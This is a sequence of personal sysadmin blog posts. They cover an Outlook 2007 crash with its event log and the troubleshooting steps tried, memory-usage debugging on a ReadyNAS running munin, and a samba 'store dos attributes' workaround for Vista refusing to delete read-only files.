Faulting application OUTLOOK.EXE, version 12.0.6212.1000, time stamp 0x46e03e45, faulting module OUTLOOK.EXE, version 12.0.6212.1000, time stamp 0x46e03e45, exception code 0xc0000005, fault offset 0x004a3d0a, process id 0x308, application start time 0x01c8b5f606eba5ae.
Event Xml:
<Event xmlns=”http://schemas.microsoft.com/win/2004/08/events/event”>
<System>
<Provider Name=”Application Error” />
<EventID Qualifiers=”0″>1000</EventID>
<Level>2</Level>
<Task>100</Task>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime=”2008-05-14T19:09:46.000Z” />
<EventRecordID>13251</EventRecordID>
<Channel>Application</Channel>
<Computer>vistabob</Computer>
<Security />
</System>
<EventData>
<Data>OUTLOOK.EXE</Data>
<Data>12.0.6212.1000</Data>
<Data>46e03e45</Data>
<Data>OUTLOOK.EXE</Data>
<Data>12.0.6212.1000</Data>
<Data>46e03e45</Data>
<Data>c0000005</Data>
<Data>004a3d0a</Data>
<Data>308</Data>
<Data>01c8b5f606eba5ae</Data>
</EventData>
</Event>


Things I tried.

  • Scanpst on all pst files. Did see an error about the junk mail list being full.
  • remove some recent office update to the junk mail filter
  • restore to last system restore before a glob of overnight office updates
  • open up mailbox in another profile, works fine, emptied deleted items.
  • open up mailbox in a new profile on another computer with 2007/xp, crashes.
  • open up mailbox in owa works fine.
  • turned off junk mail filtering in owa, lists were empty, added an address to each list.
  • use the mapi editor to remove the junk mail rule on the inbox, inconsequential.

And the winner is! Opened up mailbox in outlook 2003.

Yup, then it worked fine in 2007. Great times.

more linux memory debugging

I downgraded to an earlier version of raidiator on friday and saw no improvement in the memory black hole over the weekend. The frustrating part is being unable to tell where it is going, rather than trying to fix the problem with a particular daemon that I may not have the customized source for. My earlier blog entry about this is here. There’s more data from today in the netgear forum thread.

I did find this LKML thread by Mike Fedyk who did most of the upgrades to the munin memory script for 2.6. I can see in the thread that he decided to use the Total-Free-everythingelse=AppsUsed calculation, and I don’t see any big light bulbs in that thread to help solve my problem. I see on the net that someone that used to idle in #swn on irc is connected to a Mike Fedyk, so I’ve emailed him asking for an introduction before I try to harass him directly with the problem. I’m going to assume this is his LJ with a post about performance tuning.

My munin-users thread can be found here, for the record. I’m going to look around for more utilities to track down memory usage, although the lkml thread makes me feel like that may not be happening. I posted in the netgear thread asking for a kernel upgrade but the best advice I’ve gotten there so far is “our perl may be broken. stop running munin” so I’m not sure anyone technical is listening.

Linux Memory Usage

I’ve been trying to debug some memory problems on a ReadyNAS 1100. It has munin-node running, and I see the ‘app’ memory slowly raise something like 50-100MB a day. What’s odd is that Munin reports that it’s using 230MB of ram for ‘apps’ while memstat only reports 118224k (118MB or so), making it difficult to track down where the memory is going.

‘free’ and ‘/proc/meminfo’ only report the amount of free memory, and the amount of memory in buffers and cache other other little kernel bits. There’s no clear value for memory used. Munin calculates the used memory by subtracting other bits from memory total. I can’t find a lot of information about meminfo beyond this sort of descriptive bits about what each value means. It seems to be that if the memory is allocated, but not to buffers or cache or other small things, we assume it’s used by applications but that doesn’t pan out with tools that I can find to tell me how much memory an application is using.

The description here of the difference between VSZ (virtual size) and RSS (resident set size) is useful for looking at ‘ps aux’ output, but there’s nothing there that is using a ton of memory and feels like it’s count is pretty close to that generated by ‘memstat’.

The smugmug discussion about swappiness is interesting, as that was originally my problem because running out of memory with vm.swappiness set to 0 got the OOM killer going buck wild.  This discussion has recently made it to the lkml.

I’ll probably post to the lkml if I don’t figure something out this afternoon, as I’ve been staring at a lot of numbers lately.

Vista says you need permission to perform this action

Man this is annoying. A file tree ended up with a .svn folder which contains files marked read-only. When copied with Vista all is fine until you try to delete the folder, when you’re told “you need permission to perform this action” with “try again” and “cancel” with options, trying again many times didn’t do as much as I would have hoped. Eventually we found the files with the read-only attributes. These files are stored on a samba server so I suppose I’ll see if I can get get samba or a cron script to strip those attributes. Removing the read only attribute allows you to delete the file, but I can’t find any way to enable the old XP style dialog that tells you it is marked read only but allows you to delete it anyways if you have permissions. UAC is off, by the way.

update:

Raidiator, the debian based distro that runs on infrant (i always say infarant) / netgear readynas products has ‘store dos attributes = 1’ in the global section of /etc/samba/smb.conf. This stores the read-only / hidden / archive / system attributes in an extended attribute called user.DOSATTRIB:

getfattr -d entries
# file: entries
user.DOSATTRIB=”0x21″

Normally this is off and newer versions of samba use ‘map read only’ to determine what read only should be set to, based on the user write bit (default) (yes), the effective permissions of the user (permissions), or ignoring permissions and only using ‘store dos attributes’ (no).

I put ‘store dos attributes = 0’ in the share definition to override the global (/etc/frontview/samba/Shares.conf in raidiator) and reloaded samba (/etc/init.d/samba reload) and then the files properties showed that the file was not read only any longer, thus working around the problem of Vista not letting me delete read-only files.